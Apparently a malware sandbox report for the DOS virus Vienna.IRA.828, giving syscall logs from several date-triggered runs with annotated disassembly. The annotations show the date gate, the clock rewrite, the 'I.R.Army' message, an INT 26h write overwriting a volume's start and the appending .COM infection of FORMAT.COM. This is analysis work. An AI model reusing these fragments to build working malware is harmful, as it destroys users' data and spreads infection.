Sample viewer

vx.netlux.org/Virus.DOS.Vienna.IRA.828


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:28:06.880226572Z 255 PC: 12a5e | UNKNOWN!
; Date gate on the INT 21h/AH=2Ah result (Get date: CX = year, DH = month, DL = day).
; The window starts on the log row below with `cmp cx, 0x7c9` (0x7c9 = 1993).
2018-12-17T22:28:06.881259399Z 42 PC: 12a6b | Get date 0x12a6b: cmp cx, 0x7c9
0x12a6f: jb 0x12a8a  ; year < 1993 -> year-1990 handling at 0x12a8a
0x12a71: jge 0x12a76  ; signed >= 1993 -> re-read the date and test month/day
0x12a73: jmp 0x12ad0  ; otherwise leave via 0x12ad0 (outside this window)
0x12a75: nop
0x12a76: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12a78: int 0x21
0x12a7a: cmp dh, 9  ; month >= 9 ?
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0  ; no -> 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8  ; day >= 8 ?
0x12a85: jge 0x12aa8  ; yes -> 0x12aa8 (outside this window)
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a8e: je 0x12a9d  ; year already 1990 -> skip the clock change
0x12a90: mov ah, 0x2b  ; AH=2Bh: Set date
0x12a92: mov cx, 0x7c6  ; year forced to 1990; DH/DL are not reloaded here
0x12a95: int 0x21  ; rewrites the system date: a host-visible side effect worth alerting on
; Month/day test on the Get-date result (DH = month, DL = day), then the year-1990 clock rewrite.
; The window starts on the log row below with `cmp dh, 9`.
2018-12-17T22:28:06.884032024Z 42 PC: 12a7a | Get date 0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82  ; month >= 9 -> test the day
0x12a7f: jmp 0x12ad0  ; otherwise leave via 0x12ad0 (outside this window)
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8  ; day >= 8 -> 0x12aa8 (outside this window)
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a8e: je 0x12a9d  ; year already 1990 -> go straight to Get time
0x12a90: mov ah, 0x2b  ; AH=2Bh: Set date
0x12a92: mov cx, 0x7c6  ; year forced to 1990
0x12a95: int 0x21
0x12a97: mov ah, 0x2d  ; AH=2Dh: Set time
0x12a99: mov cl, 1  ; minutes = 1; the other time registers are not set in this window
0x12a9b: int 0x21
0x12a9d: mov ah, 0x2c  ; AH=2Ch: Get time (CH = hour, CL = minutes)
0x12a9f: int 0x21
0x12aa1: cmp cl, 0xf  ; minutes >= 15 ?
0x12aa4: jae 0x12ab2  ; yes -> 0x12ab2 (outside this window)
2018-12-17T22:28:06.886490494Z 9 PC: 12ab2 | Display string (String= ' The I.R.Army lives....... ')
2018-12-17T22:28:06.890852842Z 47 PC: 12ad5 | Get disk transfer address
2018-12-17T22:28:06.892936542Z 26 PC: 12ae8 | Set disk transfer address
2018-12-17T22:28:06.893951498Z 78 PC: 12b78 | Find first file
2018-12-17T22:28:06.897766624Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.902585905Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.905295343Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.907996738Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.911324008Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.914032767Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.916716082Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.919937465Z 78 PC: 12b78 | Find first file
2018-12-17T22:28:06.929823622Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.933109311Z 67 PC: 12bb7 | Get or set file attributes
2018-12-17T22:28:06.94122504Z 67 PC: 12bc9 | Get or set file attributes
2018-12-17T22:28:07.288465516Z 61 PC: 12bd4 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-17T22:28:07.296206572Z 87 PC: 12be0 | Get or set file date and time
; Host-file preparation: read the first 3 bytes of the opened file, then seek to its end.
; The window starts on the log row below with `mov ah, 0x3f` (AH=3Fh: Read file or device).
; NOTE(review): read-3 / seek-end here, plus the write rows logged after it, matches an appending .COM infector - confirm.
2018-12-17T22:28:07.298248038Z 44 PC: 12bec | Get time 0x12bec: mov ah, 0x3f
0x12bee: mov cx, 3  ; byte count = 3
0x12bf1: mov dx, 0x69
0x12bf4: nop
0x12bf5: add dx, si  ; buffer offset = si + 0x69
0x12bf7: int 0x21
0x12bf9: jb 0x12c51  ; CF set (DOS error) -> 0x12c51
0x12bfb: cmp ax, 3
0x12bfe: jne 0x12c51  ; fewer than 3 bytes read -> 0x12c51
0x12c00: mov ax, 0x4202  ; AH=42h, AL=02h: move file pointer relative to end of file
0x12c03: mov cx, 0
0x12c06: mov dx, 0  ; offset CX:DX = 0, so DX:AX returns the file length
0x12c09: int 0x21
0x12c0b: jb 0x12c51
0x12c0d: mov cx, ax  ; CX = low word of the file length
0x12c0f: sub ax, 3
0x12c12: mov word ptr [si + 0x6c], ax  ; stores length - 3; presumably the displacement of a 3-byte jump written at the file start - confirm
0x12c15: nop
0x12c16: add cx, 0x354  ; length + 0x354; its use is not visible in this window
0x12c1a: mov di, si
2018-12-17T22:28:07.300563382Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:28:07.306731177Z 66 PC: 12c0b | Move file pointer
2018-12-17T22:28:07.308496475Z 64 PC: 12c30 | Write file or device (Write 828 bytes on handle 5)
2018-12-17T22:28:07.316938186Z 66 PC: 12c42 | Move file pointer
2018-12-17T22:28:07.318437675Z 64 PC: 12c51 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:28:07.32146553Z 87 PC: 12c64 | Get or set file date and time
2018-12-17T22:28:07.323421233Z 62 PC: 12c68 | Close file
2018-12-17T22:28:07.330423705Z 67 PC: 12c77 | Get or set file attributes
2018-12-17T22:28:07.344365554Z 26 PC: 12c84 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5011,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:27.606783963Z 255 PC: 12a5e | UNKNOWN!
; Date gate on the INT 21h/AH=2Ah result (Get date: CX = year, DH = month, DL = day).
; The window starts on the log row below with `cmp cx, 0x7c9` (0x7c9 = 1993).
2018-12-25T11:53:27.608898289Z 42 PC: 12a6b | Get date 0x12a6b: cmp cx, 0x7c9
0x12a6f: jb 0x12a8a  ; year < 1993 -> year-1990 handling at 0x12a8a
0x12a71: jge 0x12a76  ; signed >= 1993 -> re-read the date and test month/day
0x12a73: jmp 0x12ad0  ; otherwise leave via 0x12ad0 (outside this window)
0x12a75: nop
0x12a76: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12a78: int 0x21
0x12a7a: cmp dh, 9  ; month >= 9 ?
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0  ; no -> 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8  ; day >= 8 ?
0x12a85: jge 0x12aa8  ; yes -> 0x12aa8 (outside this window)
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a8e: je 0x12a9d  ; year already 1990 -> skip the clock change
0x12a90: mov ah, 0x2b  ; AH=2Bh: Set date
0x12a92: mov cx, 0x7c6  ; year forced to 1990; DH/DL are not reloaded here
0x12a95: int 0x21  ; rewrites the system date: a host-visible side effect worth alerting on
2018-12-25T11:53:27.611336865Z 43 PC: 12a97 | Set date
2018-12-25T11:53:27.614828479Z 45 PC: 12a9d | Set time
; Payload path: minute check, message print, then an INT 26h absolute disk write.
; The window starts on the log row below with `cmp cl, 0xf` (CL = minutes from Get time).
; NOTE(review): this is the disassembly following the logged PC; no row in the syscall table corresponds to the INT 26h - confirm whether the sandbox records it.
2018-12-25T11:53:27.61853727Z 44 PC: 12aa1 | Get time 0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2  ; minutes >= 15 -> disk-write check, skipping the message
0x12aa6: jmp 0x12a76  ; otherwise back to the Get-date / month / day test
0x12aa8: mov ah, 9  ; AH=09h: print the '$'-terminated string at DS:DX
0x12aaa: mov dx, si
0x12aac: add dx, 0x41  ; string offset = si + 0x41
0x12aaf: nop
0x12ab0: int 0x21
0x12ab2: cmp byte ptr [si], 0x1a
0x12ab5: nop
0x12ab6: nop
0x12ab7: ja 0x12ad0  ; byte at [si] > 0x1a -> skip the write
0x12ab9: pushf
0x12aba: mov al, byte ptr [si]  ; AL = drive number for INT 26h, taken from [si]
0x12abc: nop
0x12abd: nop
0x12abe: mov cx, 0x100  ; CX = 0x100 (256) sectors
0x12ac1: mov dx, 0  ; DX = first logical sector 0
0x12ac4: mov bx, 1  ; DS:BX = source buffer (offset 1)
0x12ac7: int 0x26  ; DOS absolute disk write: destructive, overwrites the start of the volume (boot sector onward)
; Month/day test on the Get-date result (DH = month, DL = day), then the year-1990 clock rewrite.
; The window starts on the log row below with `cmp dh, 9`.
2018-12-25T11:53:27.620622619Z 42 PC: 12a7a | Get date 0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82  ; month >= 9 -> test the day
0x12a7f: jmp 0x12ad0  ; otherwise leave via 0x12ad0 (outside this window)
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8  ; day >= 8 -> 0x12aa8 (outside this window)
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a8e: je 0x12a9d  ; year already 1990 -> go straight to Get time
0x12a90: mov ah, 0x2b  ; AH=2Bh: Set date
0x12a92: mov cx, 0x7c6  ; year forced to 1990
0x12a95: int 0x21
0x12a97: mov ah, 0x2d  ; AH=2Dh: Set time
0x12a99: mov cl, 1  ; minutes = 1; the other time registers are not set in this window
0x12a9b: int 0x21
0x12a9d: mov ah, 0x2c  ; AH=2Ch: Get time (CH = hour, CL = minutes)
0x12a9f: int 0x21
0x12aa1: cmp cl, 0xf  ; minutes >= 15 ?
0x12aa4: jae 0x12ab2  ; yes -> 0x12ab2 (outside this window)
2018-12-25T11:53:27.622658044Z 47 PC: 12ad5 | Get disk transfer address
2018-12-25T11:53:27.626347401Z 26 PC: 12ae8 | Set disk transfer address
2018-12-25T11:53:27.627806845Z 78 PC: 12b78 | Find first file
2018-12-25T11:53:27.64017149Z 79 PC: 12b7e | Find next file
2018-12-25T11:53:27.642756644Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.654962084Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.657386268Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.659738049Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.662224514Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.664518078Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.6675372Z 78 PC: 12b78 | Find first file (See above)
2018-12-25T11:53:27.676955696Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.679846282Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T11:53:27.686692176Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T11:53:28.344620205Z 61 PC: 12bd4 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:53:28.351332553Z 87 PC: 12be0 | Get or set file date and time
; Host-file preparation: read the first 3 bytes of the opened file, then seek to its end.
; The window starts on the log row below with `mov ah, 0x3f` (AH=3Fh: Read file or device).
; NOTE(review): read-3 / seek-end here, plus the write rows logged after it, matches an appending .COM infector - confirm.
2018-12-25T11:53:28.352710963Z 44 PC: 12bec | Get time 0x12bec: mov ah, 0x3f
0x12bee: mov cx, 3  ; byte count = 3
0x12bf1: mov dx, 0x69
0x12bf4: nop
0x12bf5: add dx, si  ; buffer offset = si + 0x69
0x12bf7: int 0x21
0x12bf9: jb 0x12c51  ; CF set (DOS error) -> 0x12c51
0x12bfb: cmp ax, 3
0x12bfe: jne 0x12c51  ; fewer than 3 bytes read -> 0x12c51
0x12c00: mov ax, 0x4202  ; AH=42h, AL=02h: move file pointer relative to end of file
0x12c03: mov cx, 0
0x12c06: mov dx, 0  ; offset CX:DX = 0, so DX:AX returns the file length
0x12c09: int 0x21
0x12c0b: jb 0x12c51
0x12c0d: mov cx, ax  ; CX = low word of the file length
0x12c0f: sub ax, 3
0x12c12: mov word ptr [si + 0x6c], ax  ; stores length - 3; presumably the displacement of a 3-byte jump written at the file start - confirm
0x12c15: nop
0x12c16: add cx, 0x354  ; length + 0x354; its use is not visible in this window
0x12c1a: mov di, si
2018-12-25T11:53:28.355983737Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:53:28.361344946Z 66 PC: 12c0b | Move file pointer
2018-12-25T11:53:28.362973378Z 64 PC: 12c30 | Write file or device (Write 828 bytes on handle 5)
2018-12-25T11:53:28.371543658Z 66 PC: 12c42 | Move file pointer
2018-12-25T11:53:28.372886882Z 64 PC: 12c51 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:53:28.375587663Z 87 PC: 12c64 | Get or set file date and time
2018-12-25T11:53:28.377614677Z 62 PC: 12c68 | Close file
2018-12-25T11:53:28.384839677Z 67 PC: 12c77 | Get or set file attributes
2018-12-25T11:53:28.394333125Z 26 PC: 12c84 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5011,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:27.631506224Z 255 PC: 12a5e | UNKNOWN!
; Date gate on the INT 21h/AH=2Ah result (Get date: CX = year, DH = month, DL = day).
; The window starts on the log row below with `cmp cx, 0x7c9` (0x7c9 = 1993).
2018-12-25T11:53:27.632693915Z 42 PC: 12a6b | Get date 0x12a6b: cmp cx, 0x7c9
0x12a6f: jb 0x12a8a  ; year < 1993 -> year-1990 handling at 0x12a8a
0x12a71: jge 0x12a76  ; signed >= 1993 -> re-read the date and test month/day
0x12a73: jmp 0x12ad0  ; otherwise leave via 0x12ad0 (outside this window)
0x12a75: nop
0x12a76: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12a78: int 0x21
0x12a7a: cmp dh, 9  ; month >= 9 ?
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0  ; no -> 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8  ; day >= 8 ?
0x12a85: jge 0x12aa8  ; yes -> 0x12aa8 (outside this window)
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a8e: je 0x12a9d  ; year already 1990 -> skip the clock change
0x12a90: mov ah, 0x2b  ; AH=2Bh: Set date
0x12a92: mov cx, 0x7c6  ; year forced to 1990; DH/DL are not reloaded here
0x12a95: int 0x21  ; rewrites the system date: a host-visible side effect worth alerting on
; Payload path: minute check, message print, then an INT 26h absolute disk write.
; The window starts on the log row below with `cmp cl, 0xf` (CL = minutes from Get time).
; NOTE(review): this is the disassembly following the logged PC; no row in the syscall table corresponds to the INT 26h - confirm whether the sandbox records it.
2018-12-25T11:53:27.63581881Z 44 PC: 12aa1 | Get time 0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2  ; minutes >= 15 -> disk-write check, skipping the message
0x12aa6: jmp 0x12a76  ; otherwise back to the Get-date / month / day test
0x12aa8: mov ah, 9  ; AH=09h: print the '$'-terminated string at DS:DX
0x12aaa: mov dx, si
0x12aac: add dx, 0x41  ; string offset = si + 0x41
0x12aaf: nop
0x12ab0: int 0x21
0x12ab2: cmp byte ptr [si], 0x1a
0x12ab5: nop
0x12ab6: nop
0x12ab7: ja 0x12ad0  ; byte at [si] > 0x1a -> skip the write
0x12ab9: pushf
0x12aba: mov al, byte ptr [si]  ; AL = drive number for INT 26h, taken from [si]
0x12abc: nop
0x12abd: nop
0x12abe: mov cx, 0x100  ; CX = 0x100 (256) sectors
0x12ac1: mov dx, 0  ; DX = first logical sector 0
0x12ac4: mov bx, 1  ; DS:BX = source buffer (offset 1)
0x12ac7: int 0x26  ; DOS absolute disk write: destructive, overwrites the start of the volume (boot sector onward)
2018-12-25T11:53:27.639321394Z 47 PC: 12ad5 | Get disk transfer address
2018-12-25T11:53:27.640949275Z 26 PC: 12ae8 | Set disk transfer address
2018-12-25T11:53:27.643125117Z 78 PC: 12b78 | Find first file
2018-12-25T11:53:27.649871929Z 79 PC: 12b7e | Find next file
2018-12-25T11:53:27.652853306Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.656856983Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.659641848Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.662565136Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.666010716Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.66922141Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.671997364Z 78 PC: 12b78 | Find first file (See above)
2018-12-25T11:53:27.683067078Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.685442042Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T11:53:27.689444675Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T11:53:28.043991553Z 61 PC: 12bd4 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:53:28.053773655Z 87 PC: 12be0 | Get or set file date and time
; Host-file preparation: read the first 3 bytes of the opened file, then seek to its end.
; The window starts on the log row below with `mov ah, 0x3f` (AH=3Fh: Read file or device).
; NOTE(review): read-3 / seek-end here, plus the write rows logged after it, matches an appending .COM infector - confirm.
2018-12-25T11:53:28.055789482Z 44 PC: 12bec | Get time 0x12bec: mov ah, 0x3f
0x12bee: mov cx, 3  ; byte count = 3
0x12bf1: mov dx, 0x69
0x12bf4: nop
0x12bf5: add dx, si  ; buffer offset = si + 0x69
0x12bf7: int 0x21
0x12bf9: jb 0x12c51  ; CF set (DOS error) -> 0x12c51
0x12bfb: cmp ax, 3
0x12bfe: jne 0x12c51  ; fewer than 3 bytes read -> 0x12c51
0x12c00: mov ax, 0x4202  ; AH=42h, AL=02h: move file pointer relative to end of file
0x12c03: mov cx, 0
0x12c06: mov dx, 0  ; offset CX:DX = 0, so DX:AX returns the file length
0x12c09: int 0x21
0x12c0b: jb 0x12c51
0x12c0d: mov cx, ax  ; CX = low word of the file length
0x12c0f: sub ax, 3
0x12c12: mov word ptr [si + 0x6c], ax  ; stores length - 3; presumably the displacement of a 3-byte jump written at the file start - confirm
0x12c15: nop
0x12c16: add cx, 0x354  ; length + 0x354; its use is not visible in this window
0x12c1a: mov di, si
2018-12-25T11:53:28.058869103Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:53:28.067629302Z 66 PC: 12c0b | Move file pointer
2018-12-25T11:53:28.069698836Z 64 PC: 12c30 | Write file or device (Write 828 bytes on handle 5)
2018-12-25T11:53:28.507540798Z 66 PC: 12c42 | Move file pointer
2018-12-25T11:53:28.514520702Z 64 PC: 12c51 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:53:28.519105151Z 87 PC: 12c64 | Get or set file date and time
2018-12-25T11:53:28.523749878Z 62 PC: 12c68 | Close file
2018-12-25T11:53:28.684081996Z 67 PC: 12c77 | Get or set file attributes
2018-12-25T11:53:28.905476251Z 26 PC: 12c84 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1993,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5011,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:27.783447893Z 255 PC: 12a5e | UNKNOWN!
; Date gate on the INT 21h/AH=2Ah result (Get date: CX = year, DH = month, DL = day).
; The window starts on the log row below with `cmp cx, 0x7c9` (0x7c9 = 1993).
2018-12-25T11:53:27.785423866Z 42 PC: 12a6b | Get date 0x12a6b: cmp cx, 0x7c9
0x12a6f: jb 0x12a8a  ; year < 1993 -> year-1990 handling at 0x12a8a
0x12a71: jge 0x12a76  ; signed >= 1993 -> re-read the date and test month/day
0x12a73: jmp 0x12ad0  ; otherwise leave via 0x12ad0 (outside this window)
0x12a75: nop
0x12a76: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12a78: int 0x21
0x12a7a: cmp dh, 9  ; month >= 9 ?
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0  ; no -> 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8  ; day >= 8 ?
0x12a85: jge 0x12aa8  ; yes -> 0x12aa8 (outside this window)
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a8e: je 0x12a9d  ; year already 1990 -> skip the clock change
0x12a90: mov ah, 0x2b  ; AH=2Bh: Set date
0x12a92: mov cx, 0x7c6  ; year forced to 1990; DH/DL are not reloaded here
0x12a95: int 0x21  ; rewrites the system date: a host-visible side effect worth alerting on
; Month/day test on the Get-date result (DH = month, DL = day), then the year-1990 clock rewrite.
; The window starts on the log row below with `cmp dh, 9`.
2018-12-25T11:53:27.787463497Z 42 PC: 12a7a | Get date 0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82  ; month >= 9 -> test the day
0x12a7f: jmp 0x12ad0  ; otherwise leave via 0x12ad0 (outside this window)
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8  ; day >= 8 -> 0x12aa8 (outside this window)
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a8e: je 0x12a9d  ; year already 1990 -> go straight to Get time
0x12a90: mov ah, 0x2b  ; AH=2Bh: Set date
0x12a92: mov cx, 0x7c6  ; year forced to 1990
0x12a95: int 0x21
0x12a97: mov ah, 0x2d  ; AH=2Dh: Set time
0x12a99: mov cl, 1  ; minutes = 1; the other time registers are not set in this window
0x12a9b: int 0x21
0x12a9d: mov ah, 0x2c  ; AH=2Ch: Get time (CH = hour, CL = minutes)
0x12a9f: int 0x21
0x12aa1: cmp cl, 0xf  ; minutes >= 15 ?
0x12aa4: jae 0x12ab2  ; yes -> 0x12ab2 (outside this window)
2018-12-25T11:53:27.789449171Z 47 PC: 12ad5 | Get disk transfer address
2018-12-25T11:53:27.7980767Z 26 PC: 12ae8 | Set disk transfer address
2018-12-25T11:53:27.799384537Z 78 PC: 12b78 | Find first file
2018-12-25T11:53:27.805420759Z 79 PC: 12b7e | Find next file
2018-12-25T11:53:27.809370581Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.811782381Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.814155792Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.817508649Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.81997965Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.822458248Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.825086022Z 78 PC: 12b78 | Find first file (See above)
2018-12-25T11:53:27.838306678Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.841338577Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T11:53:27.847245251Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T11:53:28.344606725Z 61 PC: 12bd4 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:53:28.351338219Z 87 PC: 12be0 | Get or set file date and time
; Host-file preparation: read the first 3 bytes of the opened file, then seek to its end.
; The window starts on the log row below with `mov ah, 0x3f` (AH=3Fh: Read file or device).
; NOTE(review): read-3 / seek-end here, plus the write rows logged after it, matches an appending .COM infector - confirm.
2018-12-25T11:53:28.352710411Z 44 PC: 12bec | Get time 0x12bec: mov ah, 0x3f
0x12bee: mov cx, 3  ; byte count = 3
0x12bf1: mov dx, 0x69
0x12bf4: nop
0x12bf5: add dx, si  ; buffer offset = si + 0x69
0x12bf7: int 0x21
0x12bf9: jb 0x12c51  ; CF set (DOS error) -> 0x12c51
0x12bfb: cmp ax, 3
0x12bfe: jne 0x12c51  ; fewer than 3 bytes read -> 0x12c51
0x12c00: mov ax, 0x4202  ; AH=42h, AL=02h: move file pointer relative to end of file
0x12c03: mov cx, 0
0x12c06: mov dx, 0  ; offset CX:DX = 0, so DX:AX returns the file length
0x12c09: int 0x21
0x12c0b: jb 0x12c51
0x12c0d: mov cx, ax  ; CX = low word of the file length
0x12c0f: sub ax, 3
0x12c12: mov word ptr [si + 0x6c], ax  ; stores length - 3; presumably the displacement of a 3-byte jump written at the file start - confirm
0x12c15: nop
0x12c16: add cx, 0x354  ; length + 0x354; its use is not visible in this window
0x12c1a: mov di, si
2018-12-25T11:53:28.355728391Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:53:28.36101474Z 66 PC: 12c0b | Move file pointer
2018-12-25T11:53:28.362312689Z 64 PC: 12c30 | Write file or device (Write 828 bytes on handle 5)
2018-12-25T11:53:28.3737356Z 66 PC: 12c42 | Move file pointer
2018-12-25T11:53:28.375050156Z 64 PC: 12c51 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:53:28.392730251Z 87 PC: 12c64 | Get or set file date and time
2018-12-25T11:53:28.397421032Z 62 PC: 12c68 | Close file
2018-12-25T11:53:28.403852778Z 67 PC: 12c77 | Get or set file attributes
2018-12-25T11:53:28.413687403Z 26 PC: 12c84 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5011,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:27.89434639Z 255 PC: 12a5e | UNKNOWN!
; Date gate on the INT 21h/AH=2Ah result (Get date: CX = year, DH = month, DL = day).
; The window starts on the log row below with `cmp cx, 0x7c9` (0x7c9 = 1993).
2018-12-25T11:53:27.896533568Z 42 PC: 12a6b | Get date 0x12a6b: cmp cx, 0x7c9
0x12a6f: jb 0x12a8a  ; year < 1993 -> year-1990 handling at 0x12a8a
0x12a71: jge 0x12a76  ; signed >= 1993 -> re-read the date and test month/day
0x12a73: jmp 0x12ad0  ; otherwise leave via 0x12ad0 (outside this window)
0x12a75: nop
0x12a76: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12a78: int 0x21
0x12a7a: cmp dh, 9  ; month >= 9 ?
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0  ; no -> 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8  ; day >= 8 ?
0x12a85: jge 0x12aa8  ; yes -> 0x12aa8 (outside this window)
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a8e: je 0x12a9d  ; year already 1990 -> skip the clock change
0x12a90: mov ah, 0x2b  ; AH=2Bh: Set date
0x12a92: mov cx, 0x7c6  ; year forced to 1990; DH/DL are not reloaded here
0x12a95: int 0x21  ; rewrites the system date: a host-visible side effect worth alerting on
2018-12-25T11:53:27.899195803Z 43 PC: 12a97 | Set date
2018-12-25T11:53:27.903131512Z 45 PC: 12a9d | Set time
; Payload path: minute check, message print, then an INT 26h absolute disk write.
; The window starts on the log row below with `cmp cl, 0xf` (CL = minutes from Get time).
; NOTE(review): this is the disassembly following the logged PC; no row in the syscall table corresponds to the INT 26h - confirm whether the sandbox records it.
2018-12-25T11:53:27.906684858Z 44 PC: 12aa1 | Get time 0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2  ; minutes >= 15 -> disk-write check, skipping the message
0x12aa6: jmp 0x12a76  ; otherwise back to the Get-date / month / day test
0x12aa8: mov ah, 9  ; AH=09h: print the '$'-terminated string at DS:DX
0x12aaa: mov dx, si
0x12aac: add dx, 0x41  ; string offset = si + 0x41
0x12aaf: nop
0x12ab0: int 0x21
0x12ab2: cmp byte ptr [si], 0x1a
0x12ab5: nop
0x12ab6: nop
0x12ab7: ja 0x12ad0  ; byte at [si] > 0x1a -> skip the write
0x12ab9: pushf
0x12aba: mov al, byte ptr [si]  ; AL = drive number for INT 26h, taken from [si]
0x12abc: nop
0x12abd: nop
0x12abe: mov cx, 0x100  ; CX = 0x100 (256) sectors
0x12ac1: mov dx, 0  ; DX = first logical sector 0
0x12ac4: mov bx, 1  ; DS:BX = source buffer (offset 1)
0x12ac7: int 0x26  ; DOS absolute disk write: destructive, overwrites the start of the volume (boot sector onward)
; Month/day test on the Get-date result (DH = month, DL = day), then the year-1990 clock rewrite.
; The window starts on the log row below with `cmp dh, 9`.
2018-12-25T11:53:27.909850532Z 42 PC: 12a7a | Get date 0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82  ; month >= 9 -> test the day
0x12a7f: jmp 0x12ad0  ; otherwise leave via 0x12ad0 (outside this window)
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8  ; day >= 8 -> 0x12aa8 (outside this window)
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a8e: je 0x12a9d  ; year already 1990 -> go straight to Get time
0x12a90: mov ah, 0x2b  ; AH=2Bh: Set date
0x12a92: mov cx, 0x7c6  ; year forced to 1990
0x12a95: int 0x21
0x12a97: mov ah, 0x2d  ; AH=2Dh: Set time
0x12a99: mov cl, 1  ; minutes = 1; the other time registers are not set in this window
0x12a9b: int 0x21
